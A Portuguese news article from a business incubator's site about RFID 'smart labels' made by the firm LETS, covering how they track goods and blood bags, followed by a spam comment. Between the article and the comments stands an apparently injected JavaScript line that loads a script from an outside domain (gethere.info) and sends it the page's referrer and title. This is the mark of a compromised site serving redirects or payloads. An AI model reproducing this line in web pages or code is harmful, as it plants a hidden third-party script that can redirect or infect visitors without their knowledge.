• 92 3216-3892
  • secretaria@cide.org.br

Etiquetas “inteligentes” podem evitar extravio de mercadorias

Etiquetas “inteligentes” podem evitar extravio de mercadorias

labelnoticiaAs etiquetas de RFID (Radio Frequency Identification), conhecidas como “etiquetas inteligentes” capazes de rastrear produtos e patrimônios são produzidas pela Label Evolution Technology System (LETS), empresa desenvolvedora de soluções inteligentes e associada ao Centro de Incubação e Desenvolvimento Empresarial (CIDE), desde 2009.

As etiquetas de RFID podem armazenar grande quantidade de informação, gravando detalhes do produto, como lote, peso, entre outros, e evitando desvios de mercadorias e objetos dentro de uma empresa ou instituição. “A Label realiza todo o processo da etiqueta, passando pela visita ao cliente para conhecer suas necessidades, elaborando e confeccionando a etiqueta e o software mais adequado, e realizando todos os testes antes da aplicação”, diz o diretor técnico da empresa, Daniel Leão.

Outra vantagem que oferece a etiqueta é a redução de processos manuais como captura de dados, reduzindo o erro humano e permitindo que os funcionários se dediquem a atividades de maior valor agregado. “Com as etiquetas de RFID, os processos se tornam mais eficientes e confiáveis, economizando tempo em cada etapa do trabalho, e elas podem ser aplicadas, por exemplo, na área da educação e da saúde, entre outras”, diz Leão.

COMO FUNCIONA

A etiqueta inteligente RFID é um sistema composto basicamente por um chip (circuito eletrônico integrado) e antenas. As informações sobre o item identificado ficam armazenadas no chip RFID, que transmite seu ID e seus dados. “Por exemplo, em um hospital de coleta de sangue, com esse sistema, um funcionário pode fazer a leitura de 60 bolsas de sangue ao mesmo tempo, sem tocar em nenhuma bolsa, obtendo informações do nome de cada doador, do tipo de sangue, a hora em que o sangue foi armazenado, a idade do doador, etc.”, explica Leão. Isso é possível porque a leitora, também fornecida pela LETS, captura os dados e os envia a um sistema central para que sejam gravados e colocados à disposição.

Com a “etiqueta inteligente” produtos e mercadorias podem ser melhor controlados nos estoques. “Uma vez que o produto recebeu a etiqueta, passou pelo processo de leitura e, portanto, suas informações foram transmitidas ao sistema central, você garante eficiência e segurança porque, em caso de extravio dessa mercadoria, você vai conseguir rastreá-la, prevenindo roubos e diferenças no estoque”, conta o diretor técnico.

Os produtos RFID são resistentes a poeira, sujeira, altas temperaturas, vibrações e a outras condições mais severas.

Segundo Daniel Leão, a LETS é pioneira nesse segmento de “etiquetas inteligentes” na Região e domina a tecnologia. “As soluções de segurança, qualidade de economia do sistema RFID garantem ganhos para a sua empresa”, conclui.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CIDE

Uma ideia sobre “Etiquetas “inteligentes” podem evitar extravio de mercadorias

Rc Cursos OnlinePublicado em  2:01 am - out 13, 2021

Aqui é a Amanda da Silva, gostei muito do seu artigo tem
muito conteúdo de valor, parabéns nota 10.

Visite meu site lá tem muito conteúdo, que vai lhe ajudar.

Deixe sua mensagem

Pular para a barra de ferramentas